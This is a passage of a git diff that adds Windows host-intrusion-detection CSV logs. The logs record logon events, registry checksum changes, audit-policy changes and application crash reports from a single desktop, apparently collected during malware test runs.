checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : 'cf52cdc0b943279a6903187dd77773f1' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : 'bbef7fb8ffca88784a4809d3734c5f102eb31c3d' +", +"Apr 26, 2020 @ 09:57:15.094",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 09:57:05.249",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" diff --git a/data/MW_17_HIDS_3.csv b/data/MW_17_HIDS_3.csv new file mode 100644 index 0000000..d49ef06 --- /dev/null +++ b/data/MW_17_HIDS_3.csv @@ -0,0 +1,53 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 18:44:02.398",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +", +"May 22, 2020 @ 18:39:10.056",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'b8bd9a8efec7a359e742214d63c08159' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'ff937e547663041181c255a80aca46726df29b79' +", +"May 22, 2020 @ 18:39:10.040",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'dc8f80cda5e0fded41dd72670a09668a' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '64b2c741db7749f5d3f22c09bdb6517eb666e2fc' +", +"May 22, 2020 @ 18:37:39.545",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 22, 2020 @ 18:37:31.822",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 22, 2020 @ 18:32:46.102",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 18:31:27.079",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 18:31:27.067",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, diff --git a/data/MW_17_NIDS.csv b/data/MW_17_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_17_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_18_HIDS_2.csv b/data/MW_18_HIDS_2.csv new file mode 100644 index 0000000..97cb1f0 --- /dev/null +++ b/data/MW_18_HIDS_2.csv @@ -0,0 +1,3551 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 10:19:57.520",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:19:46.827",4,"Summary event of the report's signatures",,"""Fault bucket 2185101440673817794, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +P2: praid:App +P3: 3.38.2002.25003 +P4: 5e5603d7 +P5: StackHash_1e37 +P6: 0.0.0.0 +P7: 00000000 +P8: c0000005 +P9: PCH_3F_FROM_unknown+0x0000000000000000 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERED2.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF02.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF38.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1004.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.XboxGa_ff945b650ea7a758f50f2795fa89c89c57daf68_f472b3e4_6be068d3-551f-491d-ab67-2601b91313dc + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 6043e941-db82-484a-9842-0178d3634dfa +Report Status: 268435456 +Hashed bucket: e8f8e606c7fc5e89ae530a2ee18ea4c2 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:19:44.827",9,"Windows Application error event",,"""Faulting application name: GameBarFTServer.exe, version: 3.38.2002.25003, time stamp: 0x5e5603d7 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff7a3a6e38d +Faulting process id: 0x1b78 +Faulting application start time: 0x01d61bb3b3fc2e62 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe +Faulting module path: unknown +Report Id: 6043e941-db82-484a-9842-0178d3634dfa +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:19:44.514",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 26, 2020 @ 10:19:41.009",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 26, 2020 @ 10:19:24.443",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '754f1ee7e3cc78fe16476bedca194ad8' +New md5sum is : '90f14b46cd527a392c45fe92123fbceb' +Old sha1sum was: '71353faa3213206f750e881a2b1d4519bdb7044b' +New sha1sum is : '7e56dd2b19f06e5dd4400eb7a4c82f31a698242a' +", +"Apr 26, 2020 @ 10:19:24.413",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '754f1ee7e3cc78fe16476bedca194ad8' +New md5sum is : '90f14b46cd527a392c45fe92123fbceb' +Old sha1sum was: '71353faa3213206f750e881a2b1d4519bdb7044b' +New sha1sum is : '7e56dd2b19f06e5dd4400eb7a4c82f31a698242a' +", +"Apr 26, 2020 @ 10:19:23.186",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : '9dfd54b19f9e55c21128125e5102e751' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : 'e84833ac704745c78990ccc10f00b25e13c74b66' +", +"Apr 26, 2020 @ 10:19:23.167",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '9fbda96814af24f5f3d16c138948e1e3' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : '133b476e62d3fa15ca9d6d91c2368e3b889b0812' +", +"Apr 26, 2020 @ 10:19:22.674",5,"Clipboard User Service_3ddcb terminated unexpectedly",,"""The Clipboard User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:19:22.652",4,"Summary event of the report's signatures",,"""Fault bucket 1421593295057521696, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA6A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC4F.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC8F.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC2.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD60.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_a4555823d184431378d589e9aa5705236516327_a3c514cf_569ea5ed-6116-45d7-8e33-0b94de46dce0 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 568bb1aa-d5a0-4259-8363-f0fadab010af +Report Status: 268435456 +Hashed bucket: 1b46097b621a046973ba8391e6fb0c20 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:19:20.129",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xdac +Faulting application start time: 0x01d61bb3a709dcea +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 568bb1aa-d5a0-4259-8363-f0fadab010af +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:19:16.687",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:19:16.672",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:19:08.481",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : 'a3760583847a63e992a3a72934c1b306' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '14db976f0662a2dd50e42d2b09269e605b31bca7' +", +"Apr 26, 2020 @ 10:19:08.440",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '06ee04d9da091e86d711d66806729f5c' +New md5sum is : '69659bb51824551ef0e2f2191f239a24' +Old sha1sum was: '7707469f1df348faab167e60c47e12aed52a2835' +New sha1sum is : 'cb63b0626d83252dfc1dd8231d2a580d21c187b9' +", +"Apr 26, 2020 @ 10:19:08.425",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '69f9f86f89c4f1044f697b8ca9951f90' +New md5sum is : 'e9ef0b8c325bfb0a609f6799d3827654' +Old sha1sum was: 'ff1c71f7d5380708f2299827b7f088e4f472cde2' +New sha1sum is : '68007f388b116fccad66a3e01436ae1858961252' +", +"Apr 26, 2020 @ 10:19:07.408",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : '8a0a8d07eea86b539eda744d634970a7' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : '13b48166dd998d149496ded5fcb7c865b7232aad' +", +"Apr 26, 2020 @ 10:19:05.877",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +", +"Apr 26, 2020 @ 10:19:05.643",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : 'b3328f49681d0d76c741c753456eb1d9' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : 'bf952c979d4315a58b51879a04d06e5abcfb3387' +", +"Apr 26, 2020 @ 10:19:05.220",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:19:05.207",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:19:04.784",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '1679fca6bba3a5f03a7d79dff5bcb458' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : 'e9cfd3725ff4cda0fffd712cc9750e6af7b7fb6b' +", +"Apr 26, 2020 @ 10:19:04.621",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '445093b05e3c653dcf2a302f143eccc3' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : 'd573d466e7c710f11e24ad2f0302d2d81141833c' +", +"Apr 26, 2020 @ 10:19:04.109",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:19:04.047",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:19:03.419",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +", +"Apr 26, 2020 @ 10:19:00.942",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : 'd1d119358adf4b5d9f1b27ab99ecbf90' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : '19b7a7364dfbdb1bcaa923b247b0c1128527935e' +", +"Apr 26, 2020 @ 10:18:56.060",4,"Summary event of the report's signatures",,"""Fault bucket 1340614098797145948, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5fefc7f9 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER46FD.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4911.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4960.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4992.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A2F.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_taskhostw.exe_f03d5bcdadeaa8d94b71a3de2476f74781d7ec_77010e55_f6073c5d-349c-4171-93e0-67e6f6decd0a + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 62bf5efb-1180-4946-8bcc-0a1fa4955f52 +Report Status: 268435456 +Hashed bucket: 885ca8354b51bc10e29ad16b83af2f5c +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:55.857",4,"Summary event of the report's signatures",,"""Fault bucket 1574314897565228993, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5FEFC7F9 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH4631.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4632.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4662.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4683.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4962.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 91752389-45cb-4b19-93b1-f8c51082bfca +Report Status: 268435456 +Hashed bucket: 7eb09b8cb07fb8ab75d9170ee9fb1fc1 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:55.296",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 26, 2020 @ 10:18:54.423",10,"Multiple Windows error Application events",,"""Faulting application name: taskhostw.exe, version: 10.0.18362.387, time stamp: 0x5fefc7f9 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xe5c +Faulting application start time: 0x01d61bb3a5864206 +Faulting application path: C:\Windows\system32\taskhostw.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 62bf5efb-1180-4946-8bcc-0a1fa4955f52 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:18:51.978",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 26, 2020 @ 10:18:51.958",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 26, 2020 @ 10:18:46.772",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Parameters' checksum changed. +Old md5sum was: '9b8b0c1b2fdd2917dcea0a52c206fe0f' +New md5sum is : '22db61ca4d6677015583188761debc91' +Old sha1sum was: 'e2d151ced1a3ae668798b29f1dc7b3cb60fa3c6a' +New sha1sum is : 'e4ba2da980ad989eca1807f8ae283e0bae170be8' +", +"Apr 26, 2020 @ 10:18:46.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +", +"Apr 26, 2020 @ 10:18:46.325",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:18:44.549",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:44.516",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:43.706",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:43.636",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:42.701",5,"Windows Push Notifications User Service_3ddcb terminated unexpectedly",,"""The Windows Push Notifications User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:42.685",5,"Sync Host_3ddcb terminated unexpectedly",,"""The Sync Host_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:42.670",5,"Connected Devices Platform User Service_3ddcb terminated unexpectedly",,"""The Connected Devices Platform User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:40.883",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:40.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:38.652",4,"Summary event of the report's signatures",,"""Fault bucket 1712032597060996587, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: StackHash_1e37 +P5: 0.0.0.0 +P6: 00000000 +P7: c0000005 +P8: PCH_3F_FROM_unknown+0x0000000000000000 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2D2.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA26.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA85.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAB2.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBBD.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_587e13b520c95378594ab28d96677fe486af_a3c514cf_dbf04cb6-fc27-47d9-8f70-770b0c940091 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 8446e2b8-e3d2-41ee-bccd-ce765b635f5a +Report Status: 268435456 +Hashed bucket: 465c10de1bbb5ea477c25c9387b5cdeb +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:36.529",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '9dd44ab3667835a6fd354bf56c4a1651' +New md5sum is : 'ed88c4f4720f9ee85957abb94f304681' +Old sha1sum was: '00db93fa33851b88d4aa41bb77962adfafc2fc1f' +New sha1sum is : 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +", +"Apr 26, 2020 @ 10:18:33.739",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b8985f1b126d932a99487749fdf9ab61' +New md5sum is : '13dc259f379d87b2e5309e0615660fbd' +Old sha1sum was: '0aebab5e59af6a56fa1ae7562127ce870da100be' +New sha1sum is : 